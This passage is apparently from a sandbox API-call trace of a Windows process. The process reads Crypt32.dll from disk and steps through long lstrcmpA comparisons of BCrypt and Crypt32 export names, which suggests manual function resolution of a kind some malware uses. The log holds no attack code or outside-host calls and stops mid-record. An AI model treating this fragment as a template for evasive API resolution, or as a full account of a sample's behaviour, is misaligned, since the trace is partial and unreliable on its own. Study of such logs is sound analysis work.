lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateHash") returned 1 [0093.977] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateMultiHash") returned 1 [0093.977] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDecrypt") returned 1 [0093.977] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeleteContext") returned 1 [0093.977] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKey") returned 1 [0093.977] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKeyCapi") returned 1 [0093.977] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0093.977] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroyHash") returned 1 [0093.977] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroyKey") returned 1 [0093.977] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroySecret") returned 0 [0093.977] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptAddContextFunction") returned 1 [0093.977] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0093.977] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0093.977] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptConfigureContext") returned 1 [0093.977] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptConfigureContextFunction") returned 1 [0093.978] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateContext") returned 1 [0093.978] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateHash") returned 1 [0093.978] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateMultiHash") returned 1 [0093.978] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDecrypt") returned 1 [0093.978] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeleteContext") returned 1 [0093.978] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKey") returned 1 [0093.978] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKeyCapi") returned 1 [0093.978] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0093.978] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroyHash") returned 1 [0093.978] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroyKey") returned 1 [0093.978] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroySecret") returned 1 [0093.978] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDuplicateHash") returned 0 [0093.978] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptAddContextFunction") returned 1 [0093.978] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0093.979] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0093.979] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptConfigureContext") returned 1 [0093.979] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptConfigureContextFunction") returned 1 [0093.979] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateContext") returned 1 [0093.979] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateHash") returned 1 [0093.979] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateMultiHash") returned 1 [0093.979] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDecrypt") returned 1 [0093.979] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeleteContext") returned 1 [0093.979] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKey") returned 1 [0093.979] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKeyCapi") returned 1 [0093.979] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0093.979] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroyHash") returned 1 [0093.979] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroyKey") returned 1 [0093.979] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroySecret") returned 1 [0093.979] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDuplicateHash") returned 1 [0093.979] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDuplicateKey") returned 0 [0093.979] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptAddContextFunction") returned 1 [0093.979] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptAddContextFunctionProvider") returned 1 [0093.979] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0093.979] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptConfigureContext") returned 1 [0093.979] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptConfigureContextFunction") returned 1 [0093.979] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateContext") returned 1 [0093.979] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateHash") returned 1 [0093.979] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateMultiHash") returned 1 [0093.979] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDecrypt") returned 1 [0093.979] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeleteContext") returned 1 [0093.980] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKey") returned 1 [0093.980] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKeyCapi") returned 1 [0093.980] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0093.980] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroyHash") returned 1 [0093.980] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroyKey") returned 1 [0093.980] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroySecret") returned 1 [0093.980] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDuplicateHash") returned 1 [0093.980] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDuplicateKey") returned 1 [0093.980] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptEncrypt") returned 0 [0093.980] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptAddContextFunction") returned 1 [0093.980] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptAddContextFunctionProvider") returned 1 [0093.980] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0093.980] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptConfigureContext") returned 1 [0093.980] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptConfigureContextFunction") returned 1 [0093.980] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateContext") returned 1 [0093.980] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateHash") returned 1 [0093.980] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateMultiHash") returned 1 [0093.980] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDecrypt") returned 1 [0093.980] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeleteContext") returned 1 [0093.981] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKey") returned 1 [0093.981] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKeyCapi") returned 1 [0093.981] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0093.981] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroyHash") returned 1 [0093.981] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroyKey") returned 1 [0093.981] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroySecret") returned 1 [0093.981] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDuplicateHash") returned 1 [0093.981] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDuplicateKey") returned 1 [0093.981] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptEncrypt") returned 1 [0093.981] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptEnumAlgorithms") returned 0 [0093.981] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptAddContextFunction") returned 1 [0093.981] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptAddContextFunctionProvider") returned 1 [0093.981] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0093.981] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptConfigureContext") returned 1 [0093.981] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptConfigureContextFunction") returned 1 [0093.981] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateContext") returned 1 [0093.981] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateHash") returned 1 [0093.981] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateMultiHash") returned 1 [0093.981] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDecrypt") returned 1 [0093.981] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeleteContext") returned 1 [0093.981] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKey") returned 1 [0093.982] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKeyCapi") returned 1 [0093.982] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0093.982] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroyHash") returned 1 [0093.982] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroyKey") returned 1 [0093.982] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroySecret") returned 1 [0093.982] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDuplicateHash") returned 1 [0093.982] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDuplicateKey") returned 1 [0093.982] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEncrypt") returned 1 [0093.982] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEnumAlgorithms") returned 1 [0093.982] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEnumContextFunctionProviders") returned 0 [0093.982] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptAddContextFunction") returned 1 [0093.982] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptAddContextFunctionProvider") returned 1 [0093.982] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0093.982] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptConfigureContext") returned 1 [0093.982] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptConfigureContextFunction") returned 1 [0093.982] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateContext") returned 1 [0093.982] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateHash") returned 1 [0093.982] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateMultiHash") returned 1 [0093.982] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDecrypt") returned 1 [0093.982] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeleteContext") returned 1 [0093.982] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKey") returned 1 [0093.982] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKeyCapi") returned 1 [0093.982] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0093.982] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroyHash") returned 1 [0093.982] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroyKey") returned 1 [0093.982] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroySecret") returned 1 [0093.983] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDuplicateHash") returned 1 [0093.983] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDuplicateKey") returned 1 [0093.983] GetProcessHeap () returned 0x570000 [0093.983] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2db2010 | out: hHeap=0x570000) returned 1 [0093.983] GetProcessHeap () returned 0x570000 [0093.983] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x589040 [0093.984] LoadLibraryA (lpLibFileName="Crypt32.dll") returned 0x7ffc5c190000 [0094.148] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0094.149] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0094.149] GetModuleFileNameA (in: hModule=0x7ffc5c190000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\Crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")) returned 0x1f [0094.149] CreateFileA (lpFileName="C:\\Windows\\system32\\Crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0094.149] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0094.149] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0094.149] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1847520) returned 1 [0094.149] GetProcessHeap () returned 0x570000 [0094.149] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x1c30e0) returned 0x4179040 [0094.154] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0094.154] ReadFile (in: hFile=0x160, lpBuffer=0x4179040, nNumberOfBytesToRead=0x1c30e0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4179040*, lpNumberOfBytesRead=0x14f5a4*=0x1c30e0, lpOverlapped=0x0) returned 1 [0094.373] CloseHandle (hObject=0x160) returned 1 [0094.374] lstrcmpA (lpString1="CertAddCRLContextToStore", lpString2="CertAddCRLContextToStore") returned 0 [0094.374] lstrcmpA (lpString1="CertAddCRLLinkToStore", lpString2="CertAddCRLContextToStore") returned 1 [0094.374] lstrcmpA (lpString1="CertAddCRLLinkToStore", lpString2="CertAddCRLLinkToStore") returned 0 [0094.374] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCRLContextToStore") returned 1 [0094.375] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0094.375] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCTLContextToStore") returned 0 [0094.375] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCRLContextToStore") returned 1 [0094.375] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0094.375] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCTLContextToStore") returned 1 [0094.375] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCTLLinkToStore") returned 0 [0094.375] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCRLContextToStore") returned -1 [0094.375] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCRLLinkToStore") returned -1 [0094.375] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCTLContextToStore") returned -1 [0094.375] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCTLLinkToStore") returned -1 [0094.375] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCertificateContextToStore") returned 0 [0094.375] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCRLContextToStore") returned -1 [0094.375] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCRLLinkToStore") returned -1 [0094.375] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCTLContextToStore") returned -1 [0094.375] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCTLLinkToStore") returned -1 [0094.375] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0094.375] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCertificateLinkToStore") returned 0 [0094.375] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCRLContextToStore") returned 1 [0094.375] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0094.375] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCTLContextToStore") returned 1 [0094.376] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0094.376] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0094.376] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0094.376] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddEncodedCRLToStore") returned 0 [0094.376] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCRLContextToStore") returned 1 [0094.376] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0094.376] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCTLContextToStore") returned 1 [0094.376] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0094.376] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0094.376] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0094.376] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0094.376] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddEncodedCTLToStore") returned 0 [0094.376] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCRLContextToStore") returned 1 [0094.376] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0094.376] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCTLContextToStore") returned 1 [0094.377] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0094.377] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0094.377] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0094.377] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCRLToStore") returned -1 [0094.377] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCTLToStore") returned -1 [0094.377] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCertificateToStore") returned 0 [0094.377] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCRLContextToStore") returned 1 [0094.377] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCRLLinkToStore") returned 1 [0094.377] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCTLContextToStore") returned 1 [0094.377] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCTLLinkToStore") returned 1 [0094.377] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCertificateContextToStore") returned 1 [0094.377] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCertificateLinkToStore") returned 1 [0094.377] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCRLToStore") returned -1 [0094.377] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCTLToStore") returned -1 [0094.377] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCertificateToStore") returned 1 [0094.378] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 0 [0094.378] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCRLContextToStore") returned 1 [0094.378] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCRLLinkToStore") returned 1 [0094.378] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCTLContextToStore") returned 1 [0094.378] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCTLLinkToStore") returned 1 [0094.378] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCertificateContextToStore") returned 1 [0094.378] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCertificateLinkToStore") returned 1 [0094.378] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCRLToStore") returned -1 [0094.378] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCTLToStore") returned -1 [0094.378] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToStore") returned 1 [0094.378] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0094.378] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 0 [0094.378] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCRLContextToStore") returned 1 [0094.378] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCRLLinkToStore") returned 1 [0094.378] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCTLContextToStore") returned 1 [0094.378] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCTLLinkToStore") returned 1 [0094.378] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCertificateContextToStore") returned 1 [0094.379] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCertificateLinkToStore") returned 1 [0094.379] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCRLToStore") returned 1 [0094.379] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCTLToStore") returned 1 [0094.379] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToStore") returned 1 [0094.379] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0094.379] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0094.379] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 0 [0094.379] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCRLContextToStore") returned 1 [0094.379] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCRLLinkToStore") returned 1 [0094.379] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCTLContextToStore") returned 1 [0094.379] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCTLLinkToStore") returned 1 [0094.379] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCertificateContextToStore") returned 1 [0094.379] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCertificateLinkToStore") returned 1 [0094.379] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCRLToStore") returned 1 [0094.379] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCTLToStore") returned 1 [0094.379] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToStore") returned 1 [0094.379] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0094.379] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0094.379] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0094.379] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddRefServerOcspResponse") returned 0 [0094.379] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCRLContextToStore") returned 1 [0094.380] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCRLLinkToStore") returned 1 [0094.380] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCTLContextToStore") returned 1 [0094.380] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCTLLinkToStore") returned 1 [0094.380] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCertificateContextToStore") returned 1 [0094.380] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCertificateLinkToStore") returned 1 [0094.380] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCRLToStore") returned 1 [0094.380] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCTLToStore") returned 1 [0094.380] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToStore") returned 1 [0094.380] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0094.380] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0094.380] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0094.380] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddRefServerOcspResponse") returned 1 [0094.380] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddRefServerOcspResponseContext") returned 0 [0094.380] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCRLContextToStore") returned 1 [0094.380] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0094.380] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCTLContextToStore") returned 1 [0094.380] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0094.380] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0094.380] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0094.380] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0094.380] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCTLToStore") returned 1 [0094.380] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToStore") returned 1 [0094.380] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0094.380] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0094.380] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0094.381] lstrcmpA (lpString1="CertAddSerializedElementToStore", 